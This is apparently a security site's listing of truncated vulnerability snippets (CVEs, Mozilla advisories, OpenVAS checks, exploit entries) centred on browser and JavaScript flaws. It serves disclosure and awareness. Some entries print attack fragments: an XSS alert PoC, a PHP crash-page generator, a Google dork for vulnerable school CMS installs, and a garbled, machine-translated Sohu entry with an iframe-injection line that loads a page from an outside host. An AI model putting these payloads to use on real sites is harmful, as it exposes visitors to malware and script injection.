Script Execution flaw in Google drive poses security threat

Once again Google Security Team Shoot itself in the foot. Ansuman Samantaray, an Indian penetration tester discovered a small, but creative Security flaw in Google drive that poses phishing threat to million of Google users was ignored by Google Security team by replying that,"It is just a mare...

NVIDIA Install Application 2.1002.85.551 Buffer Overflow Vulnerability

NVIDIA Install Application version 2.1002.85.551 NVI2.dll unicode buffer overflow proof of concept exploit. The vulnerability is caused due to a boundary error in NVI2.DLL when handling the value assigned to the 'pDirectory' string variable in the 'AddPackages' function and can be exploited to...

Ubuntu Update for firefox USN-1638-3

Ubuntu Update for Linux kernel vulnerabilities USN-1638-3 OpenVAS Vulnerability Test $Id: gbubuntuUSN16383.nasl 7960 2017-12-01 06:58:16Z santu $ Ubuntu Update for firefox USN-1638-3 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This...

SchoolCMS Cross Site Scripting

Title: SchoolCMS Persistant XSS. Date: 03/12/12 Author: VipVince Vendor: www.poweritschools.com Google Dork: /oldcore/cal/eventform.php Tested on: Windows. This is a Persistant XSS used in the software by many schools. About 225 results 0.21 seconds The vulnerability lies in the eventform.php fil...

Mozilla: JSDependentString:: undepend string conversion results in memory corruption (MFSA 2012-52)

Use-after-free vulnerability in the JSDependentString::undepend function in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 allows remote attackers to cause a denial of service memory...

iOS JavaScript Bug Can Lead to Spoofed Sites

Apple’s iOS thus far has proven to be fairly resistant to malware and some other forms of attack, but that doesn’t mean that it is completely in the clear. A new vulnerability discovered by a researcher at a German security firm enables an attacker to take advantage of some odd JavaScript behavio...

Directory traversal

Directory traversal vulnerability in frontend/core/engine/javascript.php in Fork CMS 3.2.4 and possibly other versions before 3.2.5 allows remote attackers to read arbitrary files via a .. dot dot in the module parameter to frontend/js.php...

Ubuntu: Security Advisory (USN-1185-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Memory corruption

The browser engine in Mozilla Firefox 4.x through 5, SeaMonkey 2.x before 2.3, Thunderbird before 6, and possibly other products does not properly implement JavaScript, which allows remote attackers to cause a denial of service memory corruption and application crash or possibly execute arbitrary...

Malicious PDF Attack Baiting Defense Industry Victims

There has been a spate of spear-phishing attacks against a number of high-profile targets in the last few months, including RSA and others, and that trend is continuing unabated. Researchers have come across a fresh attack using the familiar malicious PDF attachment that appears to be targeting...

FengOffice 1.7.4 Cross Site Scripting

------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in FengOffice 1.7.4 can be exploited to execute arbitrary JavaScript. --PoC-- alert0" / alert0" /...

Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service

Exploit Title: Maxthon Browser v3.0.20.1000 .ref .replace DOS Date: January 30 2011 Author: Carlos Mario Penagos Hollmann Software Link: http://dl.maxthon.com/mx3/mx3.0.20.3000.exe Version: v3.0.20.1000 Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8...

Apple iOS Safari - 'JS .' Remote Crash

Apple iPhone 3 Safari JavaScript - dot / '.' Remote Crash . = '$string'; "; iffileputcontents"./crash.html", $code echo"Point your safari mobile browser to crash.html.\r\n"; else echo"Cannot create file.\r\n"; ?...

CVE-2010-3773

CVE-2010-3773 affects Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, and SeaMonkey before 2.0.11. The flaw involves the XMLHttpRequestSpy module in the Firebug add-on mishandling interaction between the XMLHttpRequestSpy object and chrome privileged objects, allowing remote attackers to e...

VulnCheck KEV: CVE-2010-3765

Mozilla Firefox, SeaMonkey, and Thunderbird contain an unspecified vulnerability when JavaScript is enabled. This allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation...

CVE-2010-0176

Mozilla Firefox before 3.0.19, 3.5.x before 3.5.9, and 3.6.x before 3.6.2; Thunderbird before 3.0.4; and SeaMonkey before 2.0.4 do not properly manage reference counts for option elements in a XUL tree optgroup, which might allow remote attackers to execute arbitrary code via unspecified vectors...

Sohu 2 0 1 0 show channels exist hung it to the vulnerability 0day-vulnerability warning-the black bar safety net

Together to chat about the show section,not the user input is strict filtering,which leads can be inserted into the malicious code so as to achieve hung it to the object. ! Test code: Copy the code document. write"iframe width='1 0 0 0' height=1 0 0 0' src='http://www.hackqing.cn/mm.htm/iframe";...

Cross site scripting

Unspecified vulnerability in Adium before 1.2 has unknown impact and attack vectors related to javascript: URLs, possibly cross-site scripting XSS...

Mozilla Foundation Security Advisory 2009-37

Mozilla Foundation Security Advisory 2009-37 Title: Crash and remote code execution using watch and defineSetter on SVG element Impact: Critical Announced: July 21, 2009 Reporter: PenPal Products: Firefox Fixed in: Firefox 3.5 Firefox 3.0.12 Description Security researcher PenPal reported a crash...

CVE-2009-2351

Opera 9.52 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting XSS attacks via vectors related to 1 injecting a Refresh header or 2 specifying the content of a Refresh header, a related issue to...